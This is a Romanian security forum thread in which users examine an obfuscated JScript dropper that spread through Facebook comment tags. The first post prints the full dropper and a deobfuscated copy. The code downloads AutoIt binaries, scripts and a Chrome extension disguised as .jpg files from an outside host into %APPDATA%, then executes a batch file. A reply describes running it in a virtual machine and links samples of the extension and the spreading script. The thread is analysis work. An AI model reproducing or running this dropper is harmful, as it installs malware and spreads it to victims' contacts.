Jump to content
Church

Facebook comment JS download

By Church, in Reverse engineering & exploit development

Recommended Posts

Church Newbie

Church

Posted
Posted

Salut,

Astazi am fost tag-uit intr-un comment, in momentul in care dai click pe notificare te redirectioneaza catre link

 

Sursa: 

var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3||  !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix=  new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso=  new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1=  new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this)

deobfuscat: 

/** @type {Array} */
var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\\", "ExpandEnvironmentStrings", "Mozila", "https://www.google.com", "http://userexperiencestatics.net/ext/Autoit.jpg", "\\autoit.exe", "http://userexperiencestatics.net/ext/bg.jpg", "\\bg.js", "http://userexperiencestatics.net/ext/ekl.jpg", "\\ekl.au3", 
"http://userexperiencestatics.net/ext/ff.jpg", "\\ff.zip", "http://userexperiencestatics.net/ext/force.jpg", "\\force.au3", "http://userexperiencestatics.net/ext/sabit.jpg", "\\sabit.au3", "http://userexperiencestatics.net/ext/manifest.jpg", "\\manifest.json", "http://userexperiencestatics.net/ext/run.jpg", "\\run.bat", "http://userexperiencestatics.net/ext/up.jpg", "\\up.au3", "http://whos.amung.us/pingjs/?k=pingjse346", "\\ping.js", "http://whos.amung.us/pingjs/?k=pingjse3462", "\\ping2.js", ""];
(function(dataAndEvents) {
  /**
   * @param {?} f
   * @param {?} o
   * @param {number} mayParseLabeledStatementInstead
   * @return {?}
   */
  function tryIt(f, o, mayParseLabeledStatementInstead) {
    if (!o || !f) {
      return null;
    }
    var xhr = WScript.CreateObject(_0xe519[0]);
    /**
     * @return {undefined}
     */
    xhr[_0xe519[1]] = function() {
      if (xhr[_0xe519[2]] === 4 && xhr[_0xe519[3]] === 200) {
        xa = new ActiveXObject(_0xe519[4]);
        xa[_0xe519[5]]();
        /** @type {number} */
        xa[_0xe519[6]] = 1;
        xa[_0xe519[7]](xhr.ResponseBody);
        /** @type {number} */
        xa[_0xe519[8]] = mayParseLabeledStatementInstead;
        stm2 = new ActiveXObject(_0xe519[4]);
        /** @type {number} */
        stm2[_0xe519[6]] = 1;
        stm2[_0xe519[5]]();
        stm2[_0xe519[7]](xa[_0xe519[9]]());
        stm2[_0xe519[10]](o, 2);
        stm2[_0xe519[11]]();
        xa[_0xe519[11]]();
      }
    };
    xhr[_0xe519[5]](_0xe519[12], f, false);
    xhr[_0xe519[13]](null);
  }
  /**
   * @param {?} filename
   * @param {?} path
   * @return {undefined}
   */
  function readFile(filename, path) {
    xa = new ActiveXObject(_0xe519[4]);
    xa[_0xe519[5]]();
    /** @type {number} */
    xa[_0xe519[6]] = 1;
    xa.LoadFromFile(filename);
    ix = new ActiveXObject(_0xe519[4]);
    ix[_0xe519[5]]();
    /** @type {number} */
    ix[_0xe519[6]] = 1;
    ix.LoadFromFile(path);
    stm2 = new ActiveXObject(_0xe519[4]);
    /** @type {number} */
    stm2[_0xe519[6]] = 1;
    stm2[_0xe519[5]]();
    stm2[_0xe519[7]](ix[_0xe519[9]]());
    stm2[_0xe519[7]](xa[_0xe519[9]]());
    xa[_0xe519[11]]();
    ix[_0xe519[11]]();
    stm2[_0xe519[10]](filename, 2);
    stm2[_0xe519[11]]();
  }
  fso = new ActiveXObject(_0xe519[14]);
  var fo = new ActiveXObject(_0xe519[15]);
  dataAndEvents = new ActiveXObject(_0xe519[16]);
  FileDestr = fo[_0xe519[18]](_0xe519[17]);
  mozklasor = FileDestr + _0xe519[19];
  if (!fso.FolderExists(mozklasor)) {
    fso.CreateFolder(mozklasor);
  }
  dataAndEvents.ShellExecute(_0xe519[20]);
  tryIt(_0xe519[21], mozklasor + _0xe519[22], 0);
  tryIt(_0xe519[23], mozklasor + _0xe519[24], 0);
  tryIt(_0xe519[25], mozklasor + _0xe519[26], 0);
  tryIt(_0xe519[27], mozklasor + _0xe519[28], 0);
  tryIt(_0xe519[29], mozklasor + _0xe519[30], 0);
  tryIt(_0xe519[31], mozklasor + _0xe519[32], 0);
  tryIt(_0xe519[33], mozklasor + _0xe519[34], 0);
  tryIt(_0xe519[35], mozklasor + _0xe519[36], 0);
  tryIt(_0xe519[37], mozklasor + _0xe519[38], 0);
  tryIt(_0xe519[39], mozklasor + _0xe519[40], 0);
  tryIt(_0xe519[41], mozklasor + _0xe519[42], 0);
  dataAndEvents.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0);
})(this);

Nu imi dau seama ce face, dar pare interesant.

Link to comment
Share on other sites
  • Active Members
dancezar Newbie

dancezar

Posted
  • Active Members
Posted (edited)

L-am instalat pe o masina virtuala :))) Pare sa fie targetat pentru Chrome.

 

image.png

 

Baga in %appdata% un folder Mozila , in care is niste script-uri autoit impreuna cu compiliatorul autoit. Iti instaleaza o extensie in chrome folosita sa trimita si la alte persoane acel link , acesta e script-ul  folosit pe facebook:

http://pastebin.com/9UDBCg0c

 

Script-ul extensiei chrome:

http://pastebin.com/mF0LtMZK

Daca te duci pe chrome://extensions o sa te redirectioneze:)))

 

 

In final nu stiu care este scop-ul lui de ce se raspandeste .

 

https://www.sendspace.com/file/88v34k

 

 

http://appcdn.co/data.js?r daca intri de pe chrome o sa te redirectioneze catre diferite domenii unde e tinut script-ul pentru facebook , daca intrii de pe firefox o sa iti dea jquery.

Edited by danyweb09
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...